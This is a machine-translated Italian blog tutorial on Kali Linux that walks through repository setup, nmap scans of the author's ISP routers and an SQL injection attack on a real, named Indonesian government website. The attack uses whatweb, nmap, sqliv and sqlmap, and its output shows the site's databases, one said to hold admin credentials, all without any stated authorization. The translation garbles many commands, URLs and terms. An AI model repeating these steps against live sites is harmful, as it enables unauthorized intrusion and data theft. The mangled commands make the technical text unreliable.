Tutorial Kali Linux

Tutorial Kali Linux
Se sei un esperto o almeno familiarità con Linux, comandi e ambiente, appena installato Kali Linux sulla tua macchina, volevi diventare un maestro di Kali Linux o un hacker etico, allora sei nel posto giusto. In questo articolo, tratterò un tutorial Kali Linux per gli utenti Linux che non sono già familiari con Kali e farti iniziare alcune delle tecniche di base utilizzate per gli hacking e i test di sicurezza durante l'utilizzo di Kali.

Ciao, sono Bimando, l'autore di questo articolo. Se ti piace questo articolo, dai un'occhiata all'acquisto del mio libro Practical Ethical Hacking: per i tester di penetrazione con Kali Linux. Ho lavorato duramente con il team di Linux Hint per produrre un prodotto di alta qualità, so che lo adorerai e imparerai molto.


Cos'è Kali Linux?

Kali Linux, (Rilasciato per la prima volta il 13 marzo 2013) che era formalmente noto come Backtrack, sviluppato dalla società di sicurezza offensiva Security, è una distribuzione forense e focalizzata sulla sicurezza basata sulla filiale di test di Debian. Kali Linux è progettato pensando ai test di penetrazione, al recupero dei dati e al rilevamento delle minacce. Il progetto è passato a un modello di rilascio di rotolamento all'inizio di quest'anno, nel tentativo di fornire utenti di sicurezza più aggiornati agli utenti della distribuzione. Kali Linux è gratuito e lo sarà sempre. Ha oltre 600 strumenti di test di penetrazione inclusi.

Perché Kali Linux? È giusto per te?

Kali Linux ha guadagnato molta popolarità di recente. E c'è una ragione dietro questo. L'hacking è tornato come il fresco-to-do nella cultura popolare e questo può essere attribuito in modo significativo alla serie TV MR. Robot. Sig. La popolarità del robot ha aiutato Kali Linux a ottenere nuovi utenti. Le persone con quasi alcuna conoscenza di Linux o qualsiasi cosa legata alla sicurezza informatica ora stanno cercando di usare Kali come principale distribuzione Linux.

“La nostra distribuzione di test di penetrazione più avanzata, sempre." - Sviluppatori di Kali Linux. (È scritto sulla pagina principale di Kali.Org in cima alla pagina.) Cosa ottieni da questa affermazione? Notelo: APTD (distribuzione avanzata dei test di penetrazione)? Non c'è nessun termine hacking qui letteralmente. Kali Linux è uguale alle altre distribuzioni Linux. Semplicemente detto, è una distribuzione Linux ricca di strumenti relativi alla sicurezza e mirata a esperti di sicurezza di rete e informatica. Tuttavia, l'uso di Kali Linux si concentra solo sulla sicurezza e sulla forense.

Una distribuzione Linux non è altro che un pacchetto contenente il kernel Linux, un insieme di utility e applicazioni di base e alcune impostazioni predefinite. Quindi, Kali Linux non offre qualcosa di unico in questo senso che la maggior parte degli strumenti forniti potrebbe essere installato su qualsiasi distribuzione Linux.

Kali Linux è specificamente orientato per soddisfare i requisiti dei test di penetrazione professionale e dell'auditing per la sicurezza. È rivolto a un particolare sottoinsieme di utenti Linux. Pentester, hacker, ecc. Non è una distribuzione raccomandata se ti aspetti Kali per il desktop Linux per lo scopo generale per lo sviluppo, il web design, i giochi, l'ufficio, ecc. Kali potrebbe darti alcune sfide, anche se sei un utente Linux esperto.

Cose da fare dopo aver installato Kali Linux

Dopo aver installato Kali Linux, potresti chiederti cosa fare dopo, giusto?. Tutti affrontano questo problema, non preoccuparti.

Passaggio 1: impostare il repository

In primo luogo, potresti già saperlo, ma è fondamentale impostare correttamente il repository. Come ho detto, il modello di rilascio di rotolamento di Kali Linux è nel tentativo di fornire utenti di sicurezza più aggiornati agli utenti della distribuzione. In generale, se hai Kali Linux appena installato, il repository fa riferimento al supporto che si sta utilizzando per installare. Per risolvere questo problema, è necessario modificare il repository nel repository ufficiale di Kali Linux. Il file richiesto si trova sotto /etc/apt/fonti.elenco. Apri il file con Editor di testo LeafPad e sostituisci il repository predefinito a questo repository ufficiale di rotolamento Kali:

deb http: // http.Kali.Org/Kali Kali Rolling Main Contributo non libero
# Per l'accesso al pacchetto di origine, rimborso la seguente riga
# deb-src http: // http.Kali.Org/Kali Kali Rolling Main Contributo non libero

Passaggio 2: aggiorna e aggiorna il tuo Kali Linux

Dopo quell'aggiornamento e aggiorna il sistema, sincronizza il tuo Kali Linux all'ultima versione. Per farlo aprire il terminale e digitare:

Apt Update -y && apt upgrade -y && apt dist -upgrade

Il comando "Apt Update" download e recupera i pacchetti elenca le informazioni dai repository e li "aggiorna" per ottenere informazioni sulle versioni più recenti dei pacchetti e delle loro dipendenze.

Il comando "Apt Upgrade" download e installa una versione più recente dei pacchetti di pacchetti Kali Linux installati purché non abbia errori sulle dipendenze.

"Apt Dist-Upgrade" aggiornerà tutti i pacchetti alla versione più recente disponibile, indipendentemente da cosa. E anche installare e rimuovere le dipendenze secondo necessità (installare le dipendenze per soddisfare i pacchetti, ovviamente, ma anche rimuovere le dipendenze che sono state orfane se un pacchetto che è stato aggiornato non aveva più bisogno della dipendenza.

Concetto di test di penetrazione di base con Kali Linux

Dopo aver fatto con successo quei passaggi, ci sono tre cose principali che potresti fare con Kali Linux in base al sistema mirato, incluso:

  1. Hacking di rete wireless - Hacking wifi, phising, avvelenamento ARP, ecc.
  2. Hacking di app Web - Iniezione SQL, Fal.
  3. Hacking del dispositivo - Sfruttare la macchina target per ottenere il controllo di esso.

Non includo hacking IoT, non significa che Kali Linux non abbia capacità a tale scopo. Ma, letteralmente, potrebbe appartenere anche all'hacking del dispositivo. Poiché il dispositivo ha un aspetto e una forma fisica. In questo tutorial ho coperto la conoscenza di base di loro. Da allora, Kali Linux è enorme, non si adatta a un articolo!

È inoltre necessario sapere, il ciclo o la procedura di test di penetrazione. Sono:

  1. Ricognizione - raccolta di informazioni
  2. Scansione
  3. Sfruttamento
  4. Post-sfruttamento

Wireless Network Hacking con Kali Linux

In termini di hacking della rete wireless, la vittima può variare. Perché, le reti wireless sono costituite da diverse cose, come ISP (fornitore di servizi Internet), il router e i suoi "compagni" (modem, hub, switch, ecc.) E i clienti (utenti, CCTV, computer remoto, ecc. Hanno anche possibilità vulnerabili.

Internet è una grande e complessa aggregazione di hardware di rete, collegata insieme da gateway. Tracciare il percorso che i pacchetti seguono è importante per sapere come si raggiunge un determinato nome host o indirizzo IP di destinazione.

Kali Linux ha uno strumento integrato chiamato Traceroute. TraceRoute utilizza il campo "Time to Live" del protocollo IP e tenta di suscitare una risposta ICMP Time_Exeded da ciascun gateway lungo il percorso per alcuni host. Traceroute tenta di tracciare il percorso che un pacchetto IP seguirà ad un host Internet lanciando pacchetti di sonda con un piccolo TTL (ora di vivere), quindi ascoltando una risposta "tempo superata" ICMP da un gateway. Ti darò ed esempio come tracciare un router ISP usato per gestire la nostra connessione usando Traceroute.

1. Ricognizione

La raccolta delle informazioni è l'inizio del salto più importante, non perdere questo passaggio. In questo passaggio, il nostro scopo è ottenere il più possibile informazioni utili che potremmo ottenere, e quindi queste informazioni vengono utilizzate per ulteriori passaggi.

Innanzitutto, apri un terminale e digita questo comando per iniziare a tracciare la "strada" sul sito, in questo caso ho impostato il sito su Google.com.

Traceroute Google.com

2. Scansione

Una volta lanciati i comandi, elencherà in cui il nostro pacchetto va in sequenza. Come puoi vedere sopra, ho ottenuto 3 luppoli che uno di loro è il mio server ISP. Il primo IP nell'elenco è il mio router, che funge da gateway. E i prossimi due di loro appartengono al mio ISP. Ora controlliamo il servizio che stanno eseguendo utilizzando NMAP. Quindi, gli obiettivi che scansioneremo sono 10.152.192.1 E 10.13.223.102. Nel terminale ho eseguito il seguente comando:

nmap -v -ss [ip ​​target] -pn

Abbattiamo l'argomento del comando:

-V = Abilita la modalità di verbosità

-SS = Usa la tecnica di scansione SYN TCP

-PN = Tratta tutti gli host come online - Skip Host Discovery

Ed ecco il risultato che abbiamo ottenuto.

Purtroppo, tutte le porte 10.152.192.1 sono filtrati, significa che tutte le connessioni TCP in arrivo sono bloccate da ID o firewall su questo IP. Ora, prendiamo un'altra scansione al secondo target.

3. Sfruttamento

In questa procedura, non ho intenzione di condurre il vero sfruttamento, invece ti mostro come. Sulla base del risultato della scansione NMAP sopra, sappiamo che questo IP ha un server SSH in esecuzione sulla porta 22 ed è aperto. È aperto per essere confuso, haha! Abbiamo trovato il buco, questo server SSH è il possibile buco in cui potremmo provare ad accedere. Esistono diversi strumenti in Kali Linux che supportano Bruteforce o attacchi di dizionario contro il protocollo SSH. Quello più popolare e potente è "Hydra".

OK, questa è stata una procedura di base che ha condotto un test di penetrazione su un server mirato, che nel nostro esempio qui è il mio server ISP.

Hacking di app Web con Kali Linux

In realtà, se ti appassiona, puoi impostare il tuo ambiente di hacking installando DWVA (dannata app web vulnerabile) nella tua Kali Linux. È un'applicazione Web PHP/MySQL che ha un sacco di buco vulnerabile. I suoi obiettivi principali sono di essere un aiuto per i professionisti della sicurezza per testare le proprie competenze e strumenti in un ambiente legale e aiutare gli sviluppatori Web a comprendere meglio i processi di protezione delle applicazioni Web. Puoi ottenere DWVA gratuitamente su GitHub qui: https: // github.com/etica.ACK3R/DVWA.

Per ora ti mostrerò come fare app Web su un sito reale. Ma promettimi che è limitato allo scopo educativo solo. Simuleremo un vero attacco al sito reale usando l'iniezione SQL.

Prerequisito

Strumenti coperti:

- Whatweb (preinstallato)

- NMAP (preinstallato)

- Sqliv (installa manualmente)

- SQLMAP (preinstallato)

Abbiamo bisogno di un altro strumento aggiuntivo disponibile su GitHub qui: https: // github.com/hadesy2k/sqliv, installalo prima sul nostro Kali Linux. Questo strumento ha chiamato SQLIV che è in grado di eseguire la scansione mirata fornendo un dominio specifico (con strisciamento). Digita il terminale:

Git clone https: // github.com/hadesy2k/sqliv.idiota
cd sqliv && sudo python2 configurazione.py -i

Target: www.Trenggalekkab.andare.id

1. Ricognizione

Raccogli quante più informazioni utili che potremmo ottenere. Potremmo aprire la pagina Web e rilevare quale applicazione è in esecuzione su questo sito. In primo luogo, controlliamo che tipo di sito Web è. Useremo "Whatweb" per farlo.

Whatweb www.Trenggalekkab.andare.id

Come puoi vedere il risultato sopra, l'obiettivo si trova in Indonesia. Sta correndo Apache V2.2.27 sul suo server web e anche PHP V5.4.31, Ha un indirizzo IP 103.247.21.142. Ok, prendi nota di questo. Potrebbe essere necessario visitare la sua pagina Web, cercare il file o la pagina costruiti, i parametri URL o persino il modulo di accesso. Per ora abbiamo bisogno di quell'indirizzo IP per il prossimo passaggio che sta scansionando.

2. Scansione

Come prima, utilizziamo di nuovo NMAP per scansionare quali porte e servizi sono in esecuzione sul target.

nmap -v -ss 103.247.21.142

Ed ecco il risultato che abbiamo ottenuto:

Completata Syn Stealth Scan alle 21:22, 261.93s Elsed (1000 porte totali)
Rapporto di scansione NMAP per IP-103-247-21-142.Wifian.netto.id (103.247.21.142)
L'host è attivo (0.069s latenza).
Non mostrato: 985 porte chiuse
Port State Service
21/TCP Open FTP
25/TCP Open SMTP
Dominio aperto 53/TCP
80/TCP Open HTTP
110/TCP Open POP3
111/TCP Open rpcbind
143/TCP Open IMAP
212/TCP Open Anet
443/TCP Open HTTPS
465/TCP Open SMTPS
Invio aperto 587/TCP
993/TCP Open IMAPS
995/TCP Open POP3S
3128/TCP filtrato Squid-Http
3306/TCP Open Mysql

Ci sono un sacco di porte aperte che gestiscono ogni servizio sull'obiettivo, ma quello che sembra "accattivante" è che il servizio MySQL sulla porta 3306. È indicato che questo sito sta usando mysql Per gestire le loro informazioni in database. Quindi, mi chiedo se ci sono vulnerabilità di iniezione SQL su questo sito. Quindi, eseguo nuovamente il sito utilizzando SQLIV che abbiamo appena installato. Ho digitato il comando:

sqliv -t www.Trenggalekkab.andare.id

Abbiamo trovato 2 possibili URL vulnerabili SQL su questo sito. Prendi nota di quegli URL.

3. Sfruttamento

OK, abbiamo URL vulnerabili SQL e pronti per l'esecuzione. Per fare ciò useremo SQLMAP. La sintassi è:

sqlmap “[URL vulnerabile]” - -DBS

Il comando dovrebbe apparire così:

sqlmap -u "http: // www.Trenggalekkab.andare.Id/Berita.PHP?Pagina = 208 " - -DBS

L'argomento "-dbs" è quello di dire a sqlmap di ottenere database target. Ecco l'output che abbiamo ottenuto:

[Info] Il back-end dbms è mysql
Tecnologia delle applicazioni Web: PHP 5.4.31, Apache 2.2.27
back-end dbms: mysql 5
[21:46:04] [Info] Fetching Database Names
[21:46:04] [INFO] La query SQL utilizzata restituisce 2 voci
[21:46:04] [Info] ripreso: Information_Schema
[21:46:04] [INFO] ripreso: Trengkab_trg
Database disponibili [2]:
[*] Information_Schema
[*] Trengkab_trg

SQLMAP ha trovato 2 database, ma solo uno tra questi che contiene dati sensibili, come un account credenziale amministratore. Questo è su "Trengkab_trg". Dopo aver trovato i database, c'è ancora un altro passo che dovremmo fare. Questo è trovare le tabelle e le colonne e il passaggio finale è scaricare i dati. Non ti mostrerò come qui in questa sezione, usando questo obiettivo. Almeno conosci l'idea di base sul ciclo di attacco e usando alcuni strumenti.

Hacking del dispositivo

In un futuro articolo su questo sito tratteremo l'hacking dei dispositivi, rimanete sintonizzati. Come pre-warning vorrai assicurarti di conoscere un po 'di Python per questo.